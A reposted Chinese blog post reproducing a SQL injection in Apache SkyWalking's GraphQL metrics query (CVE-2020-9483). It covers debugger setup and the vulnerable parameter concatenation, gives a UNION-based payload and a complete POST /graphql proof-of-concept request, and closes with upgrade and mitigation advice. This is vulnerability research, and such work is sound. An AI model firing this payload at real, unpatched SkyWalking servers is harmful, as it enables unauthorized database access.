碼上快樂

相關內容    簡體    繁體

skywalking遠程調試Apache SkyWalking SQL注入

本文轉載自   查看原文   2020-12-08 16:20   552 

轉載自博客:https://blog.csdn.net/caiqiiqi/article/details/107857173

參考:

  • https://www.openwall.com/lists/oss-security/2020/06/15/1
  • https://mp.weixin.qq.com/s/91MWSDYkom2Z8EVYSY37Qw
  • http://www.h2database.com/html/functions.html#h2version
  • https://s.tencent.com/research/bsafe/1011.html
  • https://blog.csdn.net/smooth00/article/details/96479544

編譯好的6.5.0版本:

wget https://archive.apache.org/dist/skywalking/6.5.0/apache-skywalking-apm-6.5.0.tar.gz cd apache-skywalking-apm-bin/bin vi oapService.sh
  • 1
  • 2
  • 3

加上調試參數:

DEBUG_OPTIONS="-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=12346"
  • 1

然后啟動:

./startup.sh
  • 1

在這里插入圖片描述
發現已經在監聽12346端口了。

下載6.5.0源碼 (https://www.apache.org/dyn/closer.cgi/skywalking/6.5.0/apache-skywalking -apm-6.5.0-src.tgz)

導入IDEA,添加Remote Configuration,並設置module classpath為oap-server。

漏洞描述:

When use H2/MySQL/TiDB as Apache SkyWalking storage, the
metadata query through GraphQL protocol, there is a SQL injection
vulnerability,
which allows to access unpexcted data. Apache SkyWalking
6.0.0 to 6.6.0, 7.0.0 H2/MySQL/TiDB storage implementations don’t use the
appropriate way to set SQL parameters.

影響版本:
6.0.0-6.6.0, 7.0.0

我改成tcp形式才成功,默認的h2是內存型的,沒找到表,導致失敗了。 編輯application.yml

在這里插入圖片描述

在這里插入圖片描述

通過調試可以發現對id參數進行了拼接:

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-kj4Fajf2-1599014338834)(http://10.255.247.160:8080/image/20200807/1596793459001.jpg)]

於是對id參數構造payload:

id: \"') UNION SELECT 1,CONCAT('~', H2VERSION(), '~')--\"
  • 1

由於where查詢語句已經結束,可以使用union注入,最后使用--注釋掉后面的內容。
在這里插入圖片描述

Demo:
在這里插入圖片描述

調用棧:

executeQuery:106, JDBCHikariCPClient (org.apache.skywalking.oap.server.library.client.jdbc.hikaricp) getLinearIntValues:117, H2MetricsQueryDAO (org.apache.skywalking.oap.server.storage.plugin.jdbc.h2.dao) getLinearIntValues:96, MetricQueryService (org.apache.skywalking.oap.server.core.query) getLinearIntValues:60, MetricQuery (org.apache.skywalking.oap.query.graphql.resolver) invoke:-1, MetricQueryMethodAccess (org.apache.skywalking.oap.query.graphql.resolver) get:147, MethodFieldResolverDataFetcher (com.coxautodev.graphql.tools) fetchField:227, ExecutionStrategy (graphql.execution) resolveField:170, ExecutionStrategy (graphql.execution) execute:59, AsyncExecutionStrategy (graphql.execution) executeOperation:158, Execution (graphql.execution) execute:100, Execution (graphql.execution) execute:558, GraphQL (graphql) parseValidateAndExecute:500, GraphQL (graphql) executeAsync:470, GraphQL (graphql) execute:401, GraphQL (graphql) execute:87, GraphQLQueryHandler (org.apache.skywalking.oap.query.graphql) doPost:81, GraphQLQueryHandler (org.apache.skywalking.oap.query.graphql) doPost:54, JettyJsonHandler (org.apache.skywalking.oap.server.library.server.jetty) service:707, HttpServlet (javax.servlet.http) service:101, JettyJsonHandler (org.apache.skywalking.oap.server.library.server.jetty) service:790, HttpServlet (javax.servlet.http) service:105, JettyJsonHandler (org.apache.skywalking.oap.server.library.server.jetty) handle:841, ServletHolder (org.eclipse.jetty.servlet) doHandle:543, ServletHandler (org.eclipse.jetty.servlet) nextHandle:188, ScopedHandler (org.eclipse.jetty.server.handler) doHandle:1239, ContextHandler (org.eclipse.jetty.server.handler) nextScope:168, ScopedHandler (org.eclipse.jetty.server.handler) doScope:481, ServletHandler (org.eclipse.jetty.servlet) nextScope:166, ScopedHandler (org.eclipse.jetty.server.handler) doScope:1141, ContextHandler (org.eclipse.jetty.server.handler) handle:141, ScopedHandler (org.eclipse.jetty.server.handler) handle:132, HandlerWrapper (org.eclipse.jetty.server.handler) handle:564, Server (org.eclipse.jetty.server) handle:320, HttpChannel (org.eclipse.jetty.server) onFillable:251, HttpConnection (org.eclipse.jetty.server) succeeded:279, AbstractConnection$ReadCallback (org.eclipse.jetty.io) fillable:110, FillInterest (org.eclipse.jetty.io) run:124, ChannelEndPoint$2 (org.eclipse.jetty.io) runJob:672, QueuedThreadPool (org.eclipse.jetty.util.thread) run:590, QueuedThreadPool$2 (org.eclipse.jetty.util.thread) run:748, Thread (java.lang)
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29
  • 30
  • 31
  • 32
  • 33
  • 34
  • 35
  • 36
  • 37
  • 38
  • 39
  • 40
  • 41

poc:

POST /graphql HTTP/1.1
Host: cqq.com:8080
Content-Type: application/json;charset=utf-8
Content-Length: 313
Connection: close

{"query":"query queryData($duration: Duration!) {globalP99: getLinearIntValues(metric: {name: \"all_p99\", id: \"') UNION ALL SELECT NULL,CONCAT('~', H2VERSION(), '~')--\" }, duration: $duration) {  values { value } }}","variables":{"duration":{"start":"2020-08-07 1417","end":"2020-08-07 1418","step":"MINUTE"}}}
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7

修復建議:
升級Apache SkyWalking至8.0版,升級鏈接:https://github.com/apache/skywalking/releases

如暫時無法升級,作為緩解措施,建議不要將Apache SkyWalking的GraphQL接口暴露在外網,或在GraphQL接口之上增加一層認證。

CVE-2020-13921

Only when using H2/MySQL/TiDB as Apache
SkyWalking storage, there is a SQL injection vulnerability in the wildcard
query cases.

參考:
https://lists.apache.org/thread.html/r6f3a934ebc54585d8468151a494c1919dc1ee2cccaf237ec434dbbd6@%3Cdev.skywalking.apache.org%3E


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 什么是Apache SkyWalking? Apache SkyWalking SkyWalking——全面認識Apache SkyWalking Apache SkyWalking SQL注入漏洞復現分析 (CVE-2020-9483) java遠程調試和skywalking agent代碼的遠程調試 SkyWalking 如何開啟Apache SkyWalking的自監控? SkyWalking調試環境搭建 Skywalking-03:Skywalking本地調試 Apache SkyWalking 告警配置指南
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM